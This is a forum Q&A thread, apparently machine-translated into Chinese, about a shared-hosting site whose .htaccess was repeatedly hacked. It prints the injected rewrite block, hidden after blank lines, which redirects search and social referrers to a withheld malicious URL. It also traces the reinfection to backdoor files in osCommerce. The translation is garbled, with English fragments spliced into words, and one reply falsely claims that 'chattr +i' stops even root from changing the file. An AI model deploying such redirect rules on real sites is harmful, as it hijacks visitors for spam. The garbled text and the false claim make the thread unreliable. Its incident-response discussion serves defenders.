大约4或5天前,一位客户回到我说,他们的网站被redirect到谷歌,雅虎等其他可疑的网站,但是当用户在浏览器地址中input网站的URL时,酒吧直接。
我尝试联系我的托pipe服务提供商,但他们一开始没有任何帮助,然后似乎永远找不到问题。
等着沮丧,我开始寻找发生了什么事。 在Google上search一些解决scheme之后,我发现我的.htaccess文件被黑客入侵了。
什么是:
<Files *> Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0" Header set Expires: 0 Header set Pragma: no-cache </Files> 已经变成
<Files *> Header set Cache-Control: "private, pre-check=0, post-check=0, max-age=0" Header set Expires: 0 Header set Pragma: no-cache </Files> //several hundred empty lines later RewriteEngine On RewriteCond %{HTTP_REFERER} .*google.* [OR] RewriteCond %{HTTP_REFERER} .*ask.* [OR] RewriteCond %{HTTP_REFERER} .*yahoo.* [OR] RewriteCond %{HTTP_REFERER} .*baidu.* [OR] RewriteCond %{HTTP_REFERER} .*youtube.* [OR] RewriteCond %{HTTP_REFERER} .*wikipedia.* [OR] RewriteCond %{HTTP_REFERER} .*qq.* [OR] RewriteCond %{HTTP_REFERER} .*excite.* [OR] RewriteCond %{HTTP_REFERER} .*altavista.* [OR] RewriteCond %{HTTP_REFERER} .*msn.* [OR] RewriteCond %{HTTP_REFERER} .*netscape.* [OR] RewriteCond %{HTTP_REFERER} .*aol.* [OR] RewriteCond %{HTTP_REFERER} .*hotbot.* [OR] RewriteCond %{HTTP_REFERER} .*goto.* [OR] RewriteCond %{HTTP_REFERER} .*infoseek.* [OR] RewriteCond %{HTTP_REFERER} .*mamma.* [OR] RewriteCond %{HTTP_REFERER} .*alltheweb.* [OR] RewriteCond %{HTTP_REFERER} .*lycos.* [OR] RewriteCond %{HTTP_REFERER} .*search.* [OR] RewriteCond %{HTTP_REFERER} .*metacrawler.* [OR] RewriteCond %{HTTP_REFERER} .*bing.* [OR] RewriteCond %{HTTP_REFERER} .*dogpile.* [OR] RewriteCond %{HTTP_REFERER} .*facebook.* [OR] RewriteCond %{HTTP_REFERER} .*twitter.* [OR] RewriteCond %{HTTP_REFERER} .*blog.* [OR] RewriteCond %{HTTP_REFERER} .*live.* [OR] RewriteCond %{HTTP_REFERER} .*myspace.* [OR] RewriteCond %{HTTP_REFERER} .*mail.* [OR] RewriteCond %{HTTP_REFERER} .*yandex.* [OR] RewriteCond %{HTTP_REFERER} .*rambler.* [OR] RewriteCond %{HTTP_REFERER} .*ya.* [OR] RewriteCond %{HTTP_REFERER} .*aport.* [OR] RewriteCond %{HTTP_REFERER} .*linkedin.* [OR] RewriteCond %{HTTP_REFERER} .*flickr.* RewriteRule ^(.*)$ /*don't want to post the malicious URL here for fear of retaliation */[R=301,L]
基本上,黑客入侵的机器人似乎在写方向,所有来自重要站点的stream量都被redirect到病毒站点。
我立即通过删除令人反感的代码来修复它,并对我的聪明的自我感到非常高兴。 我也从公共访问的主文件夹中删除了.htaccess文件,并将其保存在根目录上的一个文件夹中。 我也将权限更改为444,只能由任何人阅读。 我改变了我的FTP访问密码,我的主机控制面板,MySQL数据库等。
但是,今天的问题又回来了。 原来,我的public_html文件夹中已经安装了一个新的.htaccess文件,而且这只有我上面写的令人反感的代码,没有别的。
这是怎么回事?
我有一种感觉,这不是我的密码被盗用的情况。 我在共享主机上,也许有人在同一个硬盘上写了一段代码,快速地将.htaccess文件写入所有的邻居。 这可能吗? 有什么我可以做,确保这不再发生?
没有办法,我可以重新安装或做任何东西的主要操作系统,但…
您的网站已被黑客入侵。 您需要擦除它并从已知的良好备份中恢复。 保留一个被黑网站的副本,它的日志,以便您可以比较它的良好网站,并试图找出如何网站被入侵。
OKAY伙计,我发现了蟑螂 !
我做了一切,包括更改FTP密码,主机面板密码(痛苦地)擦除整个2GB,并上传所有备份,并更改数据库密码。
他们还是进来了
FTP日志只显示了我自己的行为。 最重要的是,.htaccess文件的最后修改时间戳与我的时间戳完全相同 (无论何时我从其重复的变形中更正),因此无法知道何时以及如何进行修改。 我猜他们正在使用filemtime()和touch()来做到这一点。
那么,事实certificate,胭脂文件通过osCommerce安装进入。 我不知道如何,但具体来说,它是通过行政区域。 在pipe理文件夹中,有这些外部文件叫做“google_analitis(sic)_somenumber”。 我注意到我的主要统计读者。 我只是看了今天正在访问的所有文件(正常日志),幸运的是,这个文件在今天再次遭到黑客攻击,所以我怀疑是一个蹩脚的脚本,而且这些文件得到了垃圾邮件发送者 – 臭名昭着写在他们的文件名。
我打开了他们,果然,他们达到了很多恶作剧。
我刚刚打开了一个使用URL的文件,我真的很惊讶这些文件提供的控制量…这是一个平滑的控制面板到整个网站!
希望这可以帮助别人…看看你的第三方应用程序,特别是当你看到大量的未知机器人在你的网站上下爬行时。
这可能是一个想法,检查该网站的FTP日志,或者询问你的提供者,如果你没有访问他们。 有人很可能会得到你的FTP详细信息,并更新.htaccess文件(通常他们喜欢编辑索引。*文件)。 我们多次看到客户端计算机感染了木马或类似的东西。
你说你已经完全删除了.htaccess文件。 这表明他们能够创build文件。 FTP访问是最有可能的,但是,还要检查文件所在的主目录(public_html)的权限。确保它们不是全局可写的。
一般来说,除非权限不严格,否则无法在共享服务器上的其他人员站点上编辑/创build文件。
快速修补程序:find每个有公共访问权限的目录。 在每个目录中创build一个空的.htaccess文件,将其所有权更改为root,将其设置为只读,将目录粘贴(+ t),以便用户只能更改自己拥有的文件。
然后阅读一些关于保护网站和htaccess文件的文档(提示:在你的apacheconfiguration文件上工作并使用各种标志可能是有用的)。
我有一个严重的问题,有人入侵我的.htaccess文件,我唯一的解决办法是使文件unhackable。 首先,我清理了.htaccess文件和所有黑客的任何PHP文件。 然后,我将文件权限更改为444(644仍允许访问).htaccess文件上。 然后,我使用shell访问我的帐户,使文件“不可变”,这意味着它不能改变!
在Linux服务器上有权访问您的帐户时,请input以下内容:#chattr + i .htaccess
现在,即使是具有root权限的用户也无法更改文件!
你需要撤消这个,input:#chattr -i .htaccess
如果您没有shell帐户访问权限,请让您的虚拟主机为您input此文件以使文件不可变。
对于非Linux帐户,只需在Google或Bing中为您的Web服务器typesinput“使文件不可变”即可。 这应该给你你需要的信息。